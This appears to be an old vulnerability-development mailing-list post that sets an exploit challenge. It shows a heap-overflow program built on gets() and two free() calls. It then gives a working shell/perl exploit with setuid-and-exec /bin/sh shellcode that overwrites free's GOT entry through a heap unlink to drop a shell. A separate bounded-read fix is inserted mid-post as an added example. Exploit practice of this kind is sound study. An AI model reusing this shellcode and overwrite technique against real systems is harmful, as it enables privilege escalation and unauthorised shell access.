Having been with the vulndev mailing list for a while now without
seeing an exploit challenge, I thought I would offer one up for
the masses... However this vulnerability is simple in design yet
appears to be difficult to exploit in C...
I have supplied a working bash script for the vuln, but it relies upon
the perl interpreter to supply the payload...
The challenge is to create a working exploit in C, and not perl or bash.
/* vuln.c */
/* familiar? ... */
#include <stdio.h>
#include <stdlib.h>
#define LEN 256
int main(void) {
char *buf1 = (char *)malloc(LEN);
char *buf2 = (char *)malloc(LEN);
printf("buf1: %p\n", buf1);
printf("buf2: %p\n", buf2);
gets(buf1);  /* unbounded read: a long line runs past buf1 into buf2's chunk header */
free(buf2);
free(buf1);
return 0;
}
Notice the gets() function and the ordering of the free()s...
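The straightforward fix for the gets() call above, as an added example (not the poster's code): a bounded line reader that cannot write past buf1 and therefore never reaches buf2's chunk header, with the truncation case handled explicitly.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LEN 256

/* Bounded replacement for the gets(buf1) call in vuln.c (added example,
 * not the poster's code). Reads at most len-1 bytes into buf, strips the
 * trailing newline and discards the rest of an over-long line, so input
 * can never run past buf into the neighbouring heap chunk's header.
 * Returns 0 on success, 1 if the line was truncated, -1 on EOF with no
 * data. buf is always NUL-terminated when len > 0. */
int read_line_bounded(char *buf, size_t len, FILE *in) {
    if (len == 0)
        return -1;
    if (fgets(buf, (int)len, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 0;
    }
    /* No newline seen: the line filled the buffer or ended at EOF.
     * Drain to end of line so the next read starts at a line boundary. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

int main(void) {
    char *buf1 = malloc(LEN);
    char *buf2 = malloc(LEN);
    if (buf1 == NULL || buf2 == NULL)
        return 1;
    if (read_line_bounded(buf1, LEN, stdin) == 1)
        fprintf(stderr, "input truncated to %d bytes\n", LEN - 1);
    /* buf2's chunk header is intact, so the free() order is harmless. */
    free(buf2);
    free(buf1);
    return 0;
}
```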
The bash script using perl is as follows...
#!/bin/sh
# Thanks je
# No error checking
shellcode=`
printf "\xeb\x10AAAABBBBCCCCDDDD"
printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
`
prog=./vuln
dest_addr=0x`objdump -R $prog | awk '$3 == "free" { print $1 }'`
code_addr=`perl -e
'printf("0x%08x",0xbfffffff-5-length("'$prog'")-length("'$shellcode'"))'
`
echo "Shell dropped"
(perl -e 'print "A"x256 . pack('l', 0) . pack('l', 256+8) .
pack('l','$dest_addr'-12). pack('l', '$code_addr') ."\n"'; cat)| env - shellcode=$shellcode ./vuln
exit 0
Hopefully I shall get responses to this challenge...
Regards...
//-----=[ EOF ]=-----//